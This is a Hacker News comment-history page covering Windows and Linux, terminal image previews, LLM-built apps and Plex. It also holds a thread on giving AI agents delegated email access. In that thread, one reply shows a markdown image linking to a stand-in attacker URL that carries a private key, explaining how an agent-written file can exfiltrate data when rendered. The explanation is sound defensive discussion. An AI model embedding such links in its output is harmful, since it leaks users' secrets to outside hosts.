Hacker News | seniorThrowaway's comments

I think you overestimate the public.


>I'm forced to use Microsoft products and they're actively hostile to Linux

How so? Powershell has openSSH built in now, and WSL2 basically works minus some annoying behavior and caveats. I have a Windows 11 laptop and I use it like you are saying as an ssh machine and web browser without much issue.


  > WSL2 basically works minus some annoying behavior and caveats.
There are a lot of annoying things. Everything is just so clunky, and I don't think that's surprising given that it is a subsystem. At least on a Mac I can still access the computer I'm typing on through the terminal. Yeah, I can do that with Winblows too, but it is non-native and clunky. I mean, ever try to open a folder with a few hundred images in it (outside the terminal)? I didn't even know this was an issue that needed to be solved. For comparison, I can open a folder in the GUI of my Linux machine that has 50k images (yay datasets) and load the previews in under a second. In my terminal it is almost instant (yes, I can see the images in my terminal, and yes, it is this type of stuff that is a lot clunkier on Windows).

And on top of that, as frustrating as OSX is (even as terrible as OSX26 is) Winblows is worse. OSX feels disconnected, but Winblows feels hostile.


What setup do you use for seeing image previews (or the images themselves?) on a terminal in Linux?


I use yazi a fair amount, but I've also configured fzf to do it. There are a lot of tools for viewing images in the terminal; chafa is a good one.

This definitely could be improved, but I honestly don't use fzf that much. I can help if you really need something, but I'm sure you could find it in the docs, or even an LLM could handle this. It requires defining a few variables and having lsd, bat, and chafa installed:

  export FZF_DEFAULT_OPTS='--ansi --preview "
    if file --mime-type {} | grep -qF image; then
      chafa --passthrough none -f sixels --size ${FZF_PREVIEW_COLUMNS}x${FZF_PREVIEW_LINES} {}
    elif file --mime-type {} | grep -aF -e directory; then
      lsd --color always --icon always --almost-all --oneline --classify --long {}
    elif file --mime-type {} | grep -aF -e binary; then
      strings {} | bat --color always --theme=Dracula --language c
    elif file --mime-type {} | grep -aF -e text -e json -e empty; then
      bat --color always --theme=Dracula --style=numbers,grid --line-range :500 {}
    fi"'


Not the original poster but possibly lsix[1], which looking at the readme should work in certain terminals on Windows as well but I haven't tried it.

[1] https://github.com/hackerb9/lsix


I prefer termimg, which supports whatever method your terminal does for images and falls back to block characters for a lower resolution preview if your terminal has no graphics support. Use this and it works the same in whatever terminal you're using.

https://github.com/srlehn/termimg


Ok, I still don't see how that's "hostile to linux" and not just windows being crappy, which it is.


Because I didn't really speak about Microsoft's hostility to Linux.

I think the moment it turned from annoyance to hate was when they bought Skype and then removed features from the Linux version. Features like... conference calling... But there are a million things like that. Go talk to Linux nerds and I'm sure you'll get a unique story each time. We've all felt the pressure.


IE. Enough said.


I think they mean that Office products and the like aren't available on a Linux OS


I'd say Macs have a far greater association with developers and tech nerds now; back then, most code was being written for Windows and Unix. I was in a university Computer Science program in the 90s, and our labs were full of Unix workstations, things like SGI and Sun. When the iMac dropped, they put them in the non-CS labs. On a personal level, I've always felt the relatively recent Mac==developer trend is driven in large part by fashion, but I've never been a fan of the Apple/Mac ecosystem, even though I can respect what the Mac is on an engineering level. So maybe I'm biased.


It's really not that hard to run them in Docker. With a little work you can give them a Sysbox (Nestybox) sidecar so they can run Docker-in-Docker. As far as permissions, the only mental model that makes sense to me is treating them like actual people: bound their permissions in the other systems, not on their own machines; basically zero trust. For instance, for email, most mail apps have had delegated permissions for a while; executives use it to have their assistants read and write their mail. That's what is needed with these too.


You still have to trust your executive assistant. I would never give someone I don't trust the ability to read and write emails for me.


If this takes off, I wonder if platforms will start providing API tokens scoped for assistants. They have permissions for non destructive actions like reading mails, flagging important mails, creating drafts, moving to trash, but not more.
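As a rough sketch of what that could look like (the scope names here are invented for illustration, not from any real provider's API): the platform checks the token's scopes server-side, so even a fully compromised assistant can never invoke send.

```python
# Hypothetical assistant-scoped token: read, flag, draft, and trash are
# allowed, but sending (the main exfiltration path) is not in the set.
ASSISTANT_SCOPES = {"mail.read", "mail.flag", "mail.draft", "mail.trash"}

def authorize(requested_action: str, token_scopes: set) -> bool:
    # Server-side check: the platform, not the agent's machine,
    # decides whether this token may perform the action.
    return requested_action in token_scopes

print(authorize("mail.draft", ASSISTANT_SCOPES))  # True: drafting allowed
print(authorize("mail.send", ASSISTANT_SCOPES))   # False: sending refused
```

The point is that enforcement lives on the platform, so it holds regardless of what the agent does locally.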


How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.


> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?


Your markdown file has an image that links to a server controlled by the attacker, and the path/query parameters in the URL you're rendering contain sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def)
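A toy illustration of the mechanism, with a regex standing in for a real markdown renderer (any renderer that emits `<img>` tags behaves the same way): the moment a viewer renders the file, it issues a GET for the image URL, and the secret rides along in the query string.

```python
import re

def render_images(md: str) -> str:
    """Convert markdown image syntax ![alt](url) into an HTML <img> tag,
    the way a typical renderer would."""
    return re.sub(r'!\[([^\]]*)\]\(([^)]+)\)', r'<img alt="\1" src="\2">', md)

# An agent tricked into writing this markdown leaks the secret as soon as
# the file is previewed: the viewer fetches the attacker's image URL.
leaked = render_images("![](https://the-attacker.com/steal?private-key=abc123def)")
print(leaked)
# <img alt="" src="https://the-attacker.com/steal?private-key=abc123def">
```

No code on the agent side ever "sends" anything; the exfiltration happens as a side effect of rendering.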



Yes. It’s kind of like giving power of attorney to Jeffery Epstein.


Seems to be working out alright for old Wexner.


>Private entities might have their own policies, but government censorship is fairly small.

It's a distinction without a difference when these "private" entities in the West are the actual power centers. Most regular people spend their waking days at work having to follow the rules of these entities, and these entities provide the basic necessities of life. What would happen if you got banned from all the grocery stores? Put on an unemployable list for having controversial outspoken opinions?


I think this is a great analogy


While quality libraries do exist, let's not pretend that most people are validating and testing the libraries they pull in, that abandoned / unmaintained libraries aren't widely used, and that managing the dependency hell caused by libraries is free.


AIs / LLMs have already been trained on best practices for most domains. I recently faced this decision, and I went the LLM custom-app path, because the software I needed was a simple internal business-type app. There are open source and COTS software packages available for this kind of thing, but they tend to be massive suites trying to solve a bunch of things I don't need, and also a minefield of licensing, freemium feature gating, and future abandonment or rug pulls into much higher costs. That has happened many times. Long story short, I decided it was less work to build the exact tool I need to solve my "right now" problem, architected for future additions. I do think this is the future.


> AIs / LLMs have already been trained on best practices for most domains.

I've been at this long enough to see that today's best practices are tomorrow's anti-patterns. We have not, in fact, perfected the creation of software. And your practices will evolve not just with the technology you use but with the problem domains you're in.

I don't mean this as an argument against LLMs or vibe coding. Just that you're always going to need a fresh corpus to train them on to keep them current... and if the pool of expertly written code dries up, models will begin to stagnate.


I've been doing this a long time too. The anti-patterns tend to come from the hype cycles of "xyz shiny tool/pattern will take away all the nasty human problems that end up creating bad software". Yes, LLMs will follow this cycle too, and I agree we are in a kind of sweet-spot moment for LLMs, where they were able to ingest massive amounts of training material from the open web. That will not be the case going forward, as people seek to more tightly guard their IP. The open question is whether the training material that exists, plus whatever the tools can self-generate, is good enough for them to improve themselves in a closed-loop cycle. LLM-generated code was the right tool for my job today; that doesn't mean it's the right tool for everyone's job, or that it always will be. The one constant in this industry is change. Sold as revolutionary, which is the truth, in the sense of going in circles/cycles.


Also, they've been trained on common practices more than they've been trained on best practices. And best practice is heavily context dependent anyways.


What if there is a new domain?


Then it is new for everyone, no?


Humans can learn from new experiences. LLMs have to be retrained (continuous learning isn't good enough yet), or you have to fit enough information into the context while still having enough for the task itself.


You're being a bit obtuse here yourself. The original premise of Plex was to stream your own media on your own network. I was a very early user, before these additional "features", pushed more by the Plex team than by user demand, were added. They made it so you had to hack the XML config file to be able to use it in the traditional no-login way; that was a pretty hostile move in my opinion, and the first eyebrow-raiser for me. They also made it so you had to have a paid account to use any of the mobile clients, a clear monetization move: there is no technical reason you can't open your Plex server to the internet and connect a mobile app that way, which is what Jellyfin allows. I worked around this for a while by connecting to my home network over a VPN and streaming in mobile Chrome, but it was less than ideal, obviously. Yes, they then offered the proxying service with dynamic TLS cert generation as another paid service; I remember it, but having never had a Plex account, let alone a paid one, it was of no interest to me. Do you work for Plex? Because your post reads like you do, especially the attitude that people don't know what features they want and need Plex to tell (sell) them.


Agree with others that it's not solely about cost. For me it was about the very clear monetization drive Plex started years ago, while remaining nominally free to use for your own media. At some point, and I've already switched off of it so maybe it's already happened, they will monetize tracking/metadata about what is in your own collection.

